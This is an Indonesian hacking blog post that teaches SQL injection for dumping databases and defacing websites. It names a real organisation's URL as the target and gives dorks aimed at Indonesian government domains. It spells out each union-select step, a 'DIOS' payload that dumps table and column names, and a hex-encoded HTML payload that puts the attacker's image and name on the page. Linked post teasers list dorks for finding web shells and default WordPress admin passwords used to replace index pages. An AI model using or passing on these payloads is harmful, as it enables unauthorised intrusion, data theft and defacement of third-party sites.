Cara belajar SQL Chall

-

Assalamualaikum wr wb jumpa lagi dengan saya MrBlackhat oke kali ini kita akan kasih tutorial Cara sql chall 
Ok kita langsung saja cikidot

Dork:-index.php?Id= site:go.id
          -news.php?id=

Dios:
concat(database(),version(),(select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema=database())and(0x00)in(@x:=concat+(@x,0x3c62723e,table_name,0x203a3a20,column_name))))x))
<center><img src="https://d.top4top.io/p_16098ygtz0.png" height="400px" width="400px"><br>terinjeck nama kalian <br>


Oke langsung saja tutorialnya

Pertama kalian dork dulu dan cari targetnya.

Disini saya sudah punya target nya contoh: http://kansascitynova.org/news.php?id=42

Jika kalian sudah punya target kalian bisa tambahin (') di belakang angka PHP?id=42 jika ada tulisan Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''42''' at line 1

Nah jika ada tulisan begitu kalia tinggal tambahin order by di belakang ' 
Contoh :
http://kansascitynova.org/news.php?id=42'+order+by+1--+- gak eror
http://kansascitynova.org/news.php?id=42'+order+by+2--+- gak eror
http://kansascitynova.org/news.php?id=42'+order+by+3--+- gak eror
Dan seterusnya, sampai eror
http://kansascitynova.org/news.php?id=42'+order+by+8--+- eror
Nanti ada tulisan Error: Unknown column '8' in 'order clause'

Kayk gitu dan selanjutnya kalian hapus order bynya ganti dengan +union+select+ Jan lupa kasih tanda - di depan angka php?id=-42 dan masukan angka eror kalian jika angka eror kalian 12 maka kalian ketik 1-12
Contoh:
http://kansascitynova.org/news.php?id=42'+union select+1,2,3,4,5,6,7--+-

Jika muncul angka togel kalian dan masukan Dios nya
Contoh angka togel kalian di 5 kalian masukkan Dios kalian 
http://kansascitynova.org/news.php?id=42'+union select+1,2,3,4,concat(database(),version(),(select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema=database())and(0x00)in(@x:=concat+(@x,0x3c62723e,table_name,0x203a3a20,column_name))))x)),6,7--+-

Nah kayak gitu,jika kalian ingin tambahkan foto kalin dengan nama kalian bisa https://www.convertstring.com/id/EncodeDecode/HexEncode jika sudah
Nanti ada angka dan lupa tambahin 0x di depan contoh:
0x3C63656E7465723E3C696D67207372633D2268747470733A2F2F642E746F7034746F702E696F2F705F31363039387967747A302E706E6722206865696768743D223430307078222077696474683D223430307078223E3C62723E746572696E6A65636B204259204D72426C61636B686174203C62723E

Kalian tinggal salin dan masukan di angka togel kalian mumpung angka togel saya ada dua
Contoh: http://kansascitynova.org/news.php?id=-42%27+union+select+1,0x3C63656E7465723E3C696D67207372633D2268747470733A2F2F642E746F7034746F702E696F2F705F31363039387967747A302E706E6722206865696768743D223430307078222077696474683D223430307078223E3C62723E746572696E6A65636B204259204D72426C61636B686174203C62723E,3,4,concat(database(),version(),(select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema=database())and(0x00)in(@x:=concat+(@x,0x3c62723e,table_name,0x203a3a20,column_name))))x)),6,7--+-

Dan hasilnya

Boom sekian dari saya tutorialnya mohon maaf jika ada salah dalam perkataan karna kita juga manusia wassalamualaikum wr wb

Jika masih belum paham bisa lihat video di bawah ini:


Komentar

Posting Komentar

Postingan populer dari blog ini

Cara deface dorking shell tebas index

-
Gambar
Assalamu'alaikum wr wb Jumpa lagi dengan saya MrBlackhat kali ini saya akan kasih tutorial cara dorking shell tanpa basa basi kita langsung saja ke tutorialnya cekidot Bahan: - HP/laptop - shell/script deface kalian - pacar biar ada semangatin Dork:  intitle:index of wso.php intext:64k intitle:index of lux.php intext:64k intitle:index of mego.php Intex:64k intitle:index of raw.php intext:64k intitle:index of H3IIO.php intext:64k intitle:index of H3IIX.php intext:48k intitle:index of shell.php intext:64k intitle:index of cgi.php intext:64k intitle:index of DrugO.php intext:64k intitle:index of xleet.php intext:48k [New Dork] intitle:index of / cgp.php intitle:index of / pgp.php intitle:index of / shell23.php intitle:index of / semo.php intitle:index of / shell9.php intitle:index of / Cih.php intitle:index of / cp2019.php intitle:index of / ml.php intitle:index of / dr.php intitle:index of / df.php intitle:index of / mst.php intitle:index of / full.ph...
Baca selengkapnya

Pengertian John the ripper Dan cara menjalankannya

-
Gambar
Assalamualaikum wr wb Jumpa dengan saya ridwan Gans oke kali ini kita gak akan tutorial karna tidak Nemu web vuln:v Oke kali kita akan bahas tentang pengertian software John the ripper siapa sih yang gak kenal dengan software yang satu ini John The Ripper  adalah suatu cr acker password yang cepat yang tersedia pada banyak platfom, antara lain UNIX, Windows, DOS, BeOS dan OpenVMS. Tujuan utama dari  John The Ripper adalah untuk mendeteksi kelemahan password pada sistem UNIX (termasuk Linux). Beberapa tips yg akan mempermudah saat menginstal John the Ripper pada windows 1. Simpan di C:/ , jangan di program files maupun folder apapun. 2. Ketika menginstal mungkin akan terlihat seperti C: / John/john1701 / dll Pindahkan semuanya keluar dari folder john1701 dan masuk ke folder pertama. Kemudian hapus john1701. 3. Sekarang ketika Anda masuk ke drive C anda dan membuka folder john, Anda akan melihat kedua folder doc untuk menjalankan, bukan john1701 4. Dalam run f...
Baca selengkapnya

Cara Deface poc Wp u/p default 2020?!

-
Gambar
 Assalamu'alaikum wr wb jumpa lagi dengan syaa MrBlackhat kali ini gua akan kasih tutorial sesuai dengan judul oke langsung tanpa basabasi kita mulai:v Bahan: you know lah bang jago:v Dork: -intitle:"My Blog - My wordpress Blog" site:terserah lu cok:v Pertama kalian dorking dulu cokkk:v oke Jika kalian dah nemu target masukan exploit nya di bawah ini Exploit:wp-login.php Contoh:site.com/wp-login U/p: admin/pass U/p:admin/admin Jika vuln maka masuk ke dashboard nya seperti di bawah ini Trus kalian mencet plugins trus cari File Manager kalau ada tulisan install berarti di install dulu tod oke kalau sudah kalian mencet kayak gambar di atas oke Terserah kalian mau apain tuh website kalau kalian ingin tebas bisa caranya gimana bang? Hapus tuh file index.php ganti SC hacked kalian oke cara manggil nya gmn bang?  Hapus di belakang domainnya contoh Site.com/wp-admin/plugins bla bla  Menjadi site.com Nanti hasilnya kayak gini Sekian dari syaa wassalamu'alaikum wr wb jika kalia...
Baca selengkapnya